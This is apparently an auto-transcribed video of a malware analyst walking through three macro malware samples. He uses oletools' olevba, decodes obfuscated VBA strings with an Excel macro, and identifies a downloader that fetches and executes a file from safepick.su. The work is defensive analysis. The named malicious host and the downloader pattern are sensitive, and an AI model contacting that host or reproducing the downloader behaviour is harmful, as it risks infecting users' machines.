 Hello and welcome to another analysis for Hedrox. I got a new microphone but I still didn't get all of the equipment that I want to have. So for now the microphone is on my desk and you might hear the sound of the fan and the typing of the keyboard is very loud. Sorry for that but I figured I would still make a video despite not having everything in place yet. Alright and I guess the audio quality is already a bit better. This week we will be looking at macro malware and I got three samples here and I didn't look into them before I recorded this video so let's be a bit surprised. I downloaded Oli Tools which is a great collection of tools to analyze macro malware and here are some of the tools of Python scripts so you need Python 2.7 for that. Alright let's try this open command here and I think the most important tool is Oli VBA because that will extract the macros of the file if there are any. So let me just drag some file in here that's the one starting with 988 and so in order to see all of it 988 lock we put it into a lockfire and now I suggest you set the language settings to visual basic that will work here and now you can see the macro of this file and you can already see that it's doing well I guess downloading something here that looks like part of an HTTP and well I guess that's the rest of it yeah yeah that's the HTTP here as safepick.su and then the well not sure which character this is and the rest of it that's where it's downloading something from so you might analyze the file that's downloaded this way okay let's take a look at the other samples okay so Python Oli VBA and 244 sample 244 no macros found interesting well we might take a look into this later maybe it's okay and and the missing one is the 4AD something okay that's here and there's another macro now you all have all of the modules in one place here and the nice thing about this tool is in the end you have a table with the most relevant things that it found there like suspicious things you might want to look at and if you use minus-minus decode you can even decode any hex strings in here which is nice so you might just repeat that with with the minus-minus decode option where's the button I don't find it minus minus decode and then then that's the 4AD yes please replace it yes we loaded and there you see the strings now in the maybe decoded form but it doesn't look very useful is the way it's here now okay here internet read file space 64 so it does it does something we don't know yet what it is okay there's a stop function and I guess it returns a string yeah that's a string and the stop function is used for these for instance for these variables create object stop with this this is that's it's decoding this so so let's let's decode this all right I want to know what's what these mean so I also need all that might also be some kind of key and these are I don't know other values so because this stop function takes two values and usually one is a key and one is a string to decode or decode okay for that I like to use Excel and create a new sheet and then you have to turn on the option for developing to for that to add a developers tab so let's see where that is okay options I guess and customize a ribbon there's a developer checkmark okay and now we have a tab for developer so that means you can create macros and let's insert a button and view code all right now we got a code editor here and we may use that for writing some or decrypting some things we found in here for instance this so let's copy this in here this returns a string don't go away with that so let's say a 2 is that the stop function is here I'm not sure if this works let's just run it now where's the sheet okay this is design mode I think please just turn it off yeah enough a process compile error so there's some mismatch of course I didn't set these values which is kind of stupid so the first one was this the second one might be any of these I guess so just copy and paste them and then there it is that's a decoded string now scripting file system object and it puts this up and clicking on the button it puts this into a 2 of the worksheet and you can do the same for the other strings you want to decode which is quite nice so let's put this into 4 and we copy this instead of the other one and I guess those are worth looking at as well and there is there's a download for the file that it downloads that's a macro malware downloader so it will download this and then execute it interesting now these are still missing let's see where they are used also here the stop function of course and here's also an open command so I believe that's indeed the way it is and also the these functions they they tell you that there's some internet connection and you all open so okay let's also check these I just overwrite it and this one and there's the rest of it I guess that's then the name for the dropped matter file or maybe in the temp folder or somewhere we could check that that's this one where it's used and that's here so get special photos before that and that's the constant 2 and now you might have to look it up like that's a constant that stands maybe for temp or something similar so you have to look up the specification of get special folder on the internet to do that yeah so that's actually it I that's all I wanted to show you how you can use Excel to deopfuscate some macro matter and how you can use only tools to get the don't say to get the contained VBA code alright then there was some this one here there was no macro found I don't know what's up with it but I told you I didn't look into them before maybe there is no macro could be that this is a clean file and I didn't but that looks that doesn't look clean right okay that's like the evil is staring into my eye I don't know what that is so why it says it can't find any macros because it somehow is to execute that stuff but I just by seeing this you will also realize even if you cannot extract anything from it using certain tools it's worth opening in the hex editor and just to look into the file and sometimes you might find macros in there you can clearly see that there are some and sometimes I just might not be referenced or something else is wrong so that the tools may be buggy you never know so usually you can see the code or parts of it that will kind of be usually it's not that clear as it is here but but a bit weird and but still you can you can make sense of out of it and the hex editor so okay that's already everything for today I hope the next time the audio will be even better I'm not sure yet okay thank you for watching see you next week I hope so bye bye